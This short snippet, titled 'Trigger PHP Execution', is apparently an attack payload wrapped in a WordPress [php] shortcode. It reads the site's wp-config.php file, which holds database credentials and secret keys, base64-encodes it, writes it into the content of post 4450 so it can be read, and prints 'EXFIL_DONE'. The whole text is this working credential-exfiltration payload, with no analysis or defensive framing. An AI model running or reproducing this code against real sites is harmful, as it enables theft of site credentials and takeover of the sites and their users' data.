Trigger PHP Execution
[php]
global $wpdb;
$file = ‘/var/www/html/wp-config.php’;
if (file_exists($file)) {
$content = base64_encode(file_get_contents($file));
$wpdb->update(‘wp_posts’, array(‘post_content’ => $content), array(‘ID’ => 4450));
echo ‘EXFIL_DONE’;
} else {
echo ‘FILE_NOT_FOUND’;
}
[/php]